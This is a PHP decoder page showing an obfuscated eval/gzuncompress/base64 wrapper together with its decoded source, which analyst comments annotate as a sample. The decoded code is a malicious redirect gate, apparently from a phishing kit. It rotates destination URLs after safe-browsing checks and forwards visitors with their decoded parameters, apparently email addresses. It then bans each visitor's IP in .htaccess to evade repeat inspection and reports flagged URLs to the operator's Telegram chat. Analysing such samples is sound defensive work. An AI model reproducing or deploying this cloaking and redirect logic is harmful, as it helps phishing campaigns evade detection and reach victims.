
PHP Decode

<?php eval(gzuncompress(base64_decode('eJzdVltT4zYUfs+v0HpS5OxAApQyHVigIRHg2dzqmN0yIaM..

Decoded Output download

// Analyst note: decoded payload of the eval()/gzuncompress()/base64_decode() wrapper.
// The visible logic is a redirect gate: it keeps a list of destination URLs,
// health-checks them, forwards each visitor to the first URL that passes, and
// reports failing URLs to a Telegram chat. Read it as a sample; do not deploy it.
//
// The constants (URLS_FILE, FAILED_PAGE_URL, REDIRECT_TYPE, TELEGRAM_BOT_*,
// SAFE_BROWSING_CHECK_INTERVAL) and helpers (checkUrlHealth, telegramBot,
// reportStyler, removeLine, isBase64, sayIt) are not defined in this listing;
// presumably they come from the three included files below (not shown here).
include 'config.php';
include_once 'functions.php';
// NOTE(review): blocker.php is not shown; the name suggests visitor filtering
// that runs before anything else in this script. Confirm against the file.
include ('blocker.php');

// Pick the visitor address: the CF-Connecting-IP request header when present,
// otherwise the TCP peer address. The header is taken as-is, so unless the
// request really arrived through that proxy the value is client-supplied.
if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
    $remoteIP = $_SERVER["HTTP_CF_CONNECTING_IP"];
} else {
    $remoteIP = $_SERVER['REMOTE_ADDR'];
}

// Adds one fixed key/value pair to the query parameters that are forwarded to
// the destination later in this script. $fuck1 and $fuck2 are not assigned in
// this listing; presumably they are set in one of the includes. TODO confirm.
$_GET[$fuck1] = ($fuck2);


// Create the state file SafeApiResult.json in the current working directory on
// first run. Initial content: safe=false, url=<value of URLS_FILE>, last_check=0,
// plus the requesting client's IP and User-Agent. The IP is taken from
// X-Real-IP, then X-Forwarded-For, then REMOTE_ADDR (all but the last are
// request headers). Flags 64|128|256 are JSON_UNESCAPED_SLASHES,
// JSON_PRETTY_PRINT and JSON_UNESCAPED_UNICODE.
// Host indicator: a file with this name and these keys next to the script.
file_exists('SafeApiResult.json') || file_put_contents('SafeApiResult.json', json_encode(['safe' => false, 'url' => URLS_FILE, 'last_check' => 0, 'client' => ['ip' => $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'], 'user-agent' => $_SERVER['HTTP_USER_AGENT']]], 64 | 128 | 256));

// Load the cached check result as an associative array.
$safeApiResults = json_decode(file_get_contents('SafeApiResult.json'), true);
// Set to true once a Telegram report has been sent during this request, so the
// failure branch at the end of the script does not send a second one.
$reported = false;

// Re-check the destination list when the cached result is older than
// SAFE_BROWSING_CHECK_INTERVAL seconds. The constant name suggests the check
// is a browser safe-browsing lookup; checkUrlHealth() is not shown, so confirm.
if ((time() - $safeApiResults['last_check']) > SAFE_BROWSING_CHECK_INTERVAL) {
    // One candidate URL per non-empty line of URLS_FILE, tried in file order.
    foreach (file(URLS_FILE, FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES) as $line) {
        // Replace the cached state with the result for this candidate, again
        // recording the current visitor's IP (header-derived) and User-Agent.
        $safeApiResults = ['safe' => checkUrlHealth($line), 'url' => $line, 'last_check' => time(), 'last_check_human' => date('Y/m/d H:i:s'), 'client' => ['ip' => $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'], 'user-agent' => $_SERVER['HTTP_USER_AGENT']]];
        // Short-circuit chain: telegramBot() runs only when the URL is not safe.
        // `||` binds tighter than `and`, so this parses as
        // (safe || telegramBot(...)) and ($reported = true); $reported is set
        // whenever the URL is safe or telegramBot() returns a truthy value.
        // The message goes to the chat id in TELEGRAM_BOT_ADMIN_USERID.
        $safeApiResults['safe'] || telegramBot('sendMessage', [
            'chat_id'    => TELEGRAM_BOT_ADMIN_USERID,
            'text'       => "*Not Safe URL Report:*
" . reportStyler($safeApiResults),
            'parse_mode' => 'Markdown',
        ]) and ($reported = true);
        // First candidate that passes becomes the active destination.
        if($safeApiResults['safe']) {
            break;
        }
        // Failed candidate: presumably dropped from URLS_FILE so it is not tried
        // again (removeLine() is not shown). If every line fails, the state
        // keeps the last failed URL with safe=false.
        removeLine($line, URLS_FILE);
    }
    // Persist the outcome. If URLS_FILE yielded no lines, this rewrites the
    // previously loaded state unchanged, including its old last_check.
    file_put_contents('SafeApiResult.json', json_encode($safeApiResults, 64 | 128 | 256));
}

// Build the query string that is appended to the destination URL from the
// incoming request's GET parameters.
$query = null;
// An entry was assigned to $_GET near the top of the script, so this condition
// is expected to hold on every request.
if($_GET !== []) {
    // Values are rewritten in place through the reference.
    foreach ($_GET as $key => &$value) {
        // The parameter injected by the script itself is passed through as-is.
        if ($key === $fuck1) continue;
        // Any value that isBase64() accepts is replaced by its decoded form
        // (helper not shown). Visitor-supplied data is forwarded after decoding
        // with no further validation visible here.
        $value = isBase64($value) ? base64_decode($value) : $value;
    }
    // Drop the dangling reference left by the by-reference foreach.
    unset($value);
    $query = http_build_query($_GET);
    // Restore literal '@' that http_build_query() encoded as %40; presumably
    // the parameters carry e-mail addresses. TODO confirm.
    $query = '?' . str_replace(['%40'], ['@'], $query);
    // If the last path segment of the destination URL contains no dot (no file
    // name or bare host), put a '/' before the '?'.
    $currentUrl = explode('/', $safeApiResults['url']);
    if (strpos(end($currentUrl), '.') === false) {
        $query = '/' . $query;
    }
}


// Redirecting: send the visitor to the active destination when it passed the
// check, otherwise to FAILED_PAGE_URL.
if ($safeApiResults['safe']) {
    
    // Before redirecting, add the visitor address to .htaccess as a deny rule,
    // so later requests from that address receive 403. When the file does not
    // exist yet it is created with ErrorDocument 403 pointing at FAILED_PAGE_URL,
    // directory listing off, and Apache 2.2-style "order allow,deny" access
    // rules. Net effect: each address is forwarded once, then sent to the
    // failed page.
    // Host indicators: an .htaccess that keeps growing by one "deny from" line
    // per visitor, with a 403 ErrorDocument set to an external URL.
    // NOTE(review): $remoteIP may be copied verbatim from a request header (see
    // top of script) and is written without validation, so the addresses in
    // this file are not reliable evidence of real client IPs.
    if (file_exists(".htaccess") ==true){
    file_put_contents(".htaccess", "
deny from ".$remoteIP, FILE_APPEND);
}
else{
    file_put_contents(".htaccess", 'ErrorDocument 403 '.FAILED_PAGE_URL."
".'Options -Indexes'."
".'order allow,deny'."
".'allow from all'."
".'deny from '.$remoteIP);
}

    // REDIRECT_TYPE 1 uses an HTTP Location header; any other value passes a
    // <script> that sets window.location.href to sayIt() (helper not shown,
    // presumably prints it). Destination is the stored URL plus the rebuilt query.
    (REDIRECT_TYPE === 1) ? header('Location: ' . $safeApiResults['url'] . $query) : sayIt("<script type=\"text/javascript\">window.location.href = \"" . $safeApiResults['url'] . $query . "\"</script>
");
}
else {
    // No destination passed the check: same two redirect mechanisms, but to
    // FAILED_PAGE_URL and without the query string.
    (REDIRECT_TYPE === 1) ? header('Location: ' . FAILED_PAGE_URL) : sayIt("<script type=\"text/javascript\">window.location.href = \"" . FAILED_PAGE_URL . "\"</script>
");
    // Optionally report the failure on every request, unless a report was
    // already sent by the URL check earlier in this request.
    if (TELEGRAM_BOT_REPORT_EVERY_TIME && !$reported) {
        telegramBot('sendMessage', [
            'chat_id'    => TELEGRAM_BOT_ADMIN_USERID,
            'text'       => "*Not Safe URL Report:*
" . reportStyler($safeApiResults),
            'parse_mode' => 'Markdown',
        ]);
    }
}


Original Code

<?php 
// Packing wrapper: the single statement below base64-decodes the string literal,
// inflates it with gzuncompress() and hands the resulting PHP source to eval().
// The "Decoded Output" listing on this page is the result of the first two steps.
// For analysis, recover the inner source by decoding and decompressing only;
// do not run the eval(). The nested call eval(gzuncompress(base64_decode(...)))
// in a file under a web root is a common packing pattern worth a content-scan rule.

eval(gzuncompress(base64_decode('eJzdVltT4zYUfs+v0HpS5OxAApQyHVigIRHg2dzqmN0yIaMRtkK8OLYryVxm4b/3SI6DE6C0nT506gdbOjo3ffrOkcPYj7KAI+wn8SS8rqfTFO9XwlxKk9iHpUkW+ypMYrm8imx8FSX+DRdGXtuvVMIJskMpubKrdEjcL8QdWWeeN6CtE9rq93qk5Tm9U+oMrHGthr5XEDxVwWeJ4s4AHaB3rfYrT4hHkv+ZLXZJt+8R2my3XawtKpUqPSXeqDrJ/JutMejaZritU640GqglOFMcDdmEN9PQ5TKLVP2bTGI0CSNe0S/K70OppI1fKuEaenw0mjTNFAUgFY/fUF1H+kN57CcBt0dYggpGB4dowmBX6whnIjLzc7czpCdOh4AsYhLcTrl/Y5Y2QeRHIcQw0xEOUzN4BsCA9xt1SbMDqOExOjp6uXrSd7823TZp69GqzhKEOi3JxQa7LmKuODuHGW2ekp6Hx2NQ391Bj2hr+2d4b/+0W9MwA8pfmAjZVcRlpSrLyEg4EINKwA0qBslr/g6StXWkRMbBN5AgTYTiAfgxMObhWhqwML7WUBpi2iqccbuGNtBK/FEZ4XENHaJh84TQY7f/daiJ1zojrc/U6Xmw52an4O0kAdb4U2TytUvnpd/UOe31XUJ75CvtOD0yfDTS4WdnQEl34F3k0hpiElWjMOaFV8PqF/CUiGKyPBfRGWeRmtq5cYk4RvCSNPnel+R0ms1YbFYDoL+NLxqzRoDO9sI9qeH9T5Ns/y205lCNdU0qHvFrwWbHibKx5HHQ5VJCACjD0cJeP9ifMkXDAOsJhPZIh5y6zS497nuQX9fpmfBOe33ZTPF7hecTMLM+9hJl2ogmHXINL/c+XsYWqqOcpUP1EHFhryRdW/GbMiE5nUE1GCRwl4mbILmD/rHQA56yOIBOVmL/vCAKlXCyGqcAp8w2/VwBlW+eDZ8WI91fb3kHKGXPibUg+jxQrvtPut9Kbq+1jSdTyQOR+HBwupZPuUK/Zlw8VKq/6w9sOs6iCO4k2Ktu8ujDAZTL+EWR5ou62m74g8Z0rXrLomyp7nSTyJfBR35Z1JDeUBhnvEQ4YwiRQ3nMJN/dsQtXR+jKCIpOVsj35jZlxLLYXJO5Rr6w2NJUqZReZWEUUCPKs1/VwkcYaCWVoECBiPn6PvlhZ1OX0gj/oj+5amHnZ0LA0UDvAGN+n0Y6RdyAU3nBEt1MxnM7jQoESRNpQwXZJTe6R9Th9tNwmca71MQWaTZ0mvm0AOApv3ddHoSCw79FfG069DtsXaRTvpCt+lQxX/PD0pmYEvj+BidLuuvIuowDHj+giUhmyKovfiXmDbw5GJBe23BQ/3D8JZeYCJGIduJnM1hEO5s/AkAnTXDXpgNoXRSKpw5xrTrup+aPCm04kMU9l3guT0TABWJRlNyt6/QKuZHkucKwkD5vAD9vIK8bna7tkrbjwu8T9S4GxJzTlmbplDOIYuNO4jOdxh4yR/QqCxZnp2ks2YOjbOuT9EWYKqQeUn5waeku2PjGblkuvrQO78IY2lU9mvuvTwWfABUuLev9ODCwLq1PjdzZIexzcQhzHvy9ba3g/69tY8Xvq2kXhF26T1wy6LseJXC1XVDP6RK0toY+LPp4uYj+3xfYohv8AXa9upc=')));
?>

Function Calls

gzuncompress 1
base64_decode 1

Variables

None

Stats

MD5 4e067d1a37ab8f993f99c3246446fac3
Eval Count 1
Decode Time 35 ms